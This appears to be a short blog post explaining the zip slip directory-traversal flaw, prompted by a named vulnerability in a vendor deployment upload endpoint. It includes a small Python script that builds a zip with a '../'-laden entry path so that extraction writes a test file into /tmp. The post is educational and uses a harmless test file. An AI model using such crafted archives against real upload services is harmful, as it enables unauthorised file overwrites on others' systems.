ZIP slip vulnerability

December 1, 2023 • Read: 2060 • 常山

Today a workmate shared with me a vulnerability called kingdee-Apusic-deployApp-upload. In this vulnerability, I found that the request body is a zip file, but my attempts to modify this zip file in the request body were not successful. Finally, I found that this vulnerability is called zip slip.

Directory traversal

I believe everyone working in cyber security knows about the directory traversal vulnerability. It allows an application's access control to be bypassed by inserting ../ into a path. The ../ sequence reaches directories outside the current directory, so files in other directories can be downloaded, read, or written.

Zip slip

Zip slip is a type of directory traversal vulnerability. A malicious zip file is uploaded, and when the application extracts it, a file is written into a directory chosen by whoever built the archive rather than into the intended extraction directory.

How is a zip file with a zip slip entry created? I found this code on Zhihu:

import zipfile

# the name of the zip file to generate; the with block closes it so the archive is finalized
with zipfile.ZipFile('out.zip', 'w') as zf:
    # the name of the malicious file that will overwrite the original file (must exist on disk)
    fname = 'sec_test.txt'
    # destination path of the file, stored as the entry name inside the archive
    zf.write(fname, '../../../../../../../../../../../../../../../../../../../../../../../../tmp/sec_test.tmp')

This code creates a zip file named out.zip. If this zip file is uploaded to a web application that has the directory traversal vulnerability and the application extracts it, the file is written into the directory named in the entry path.
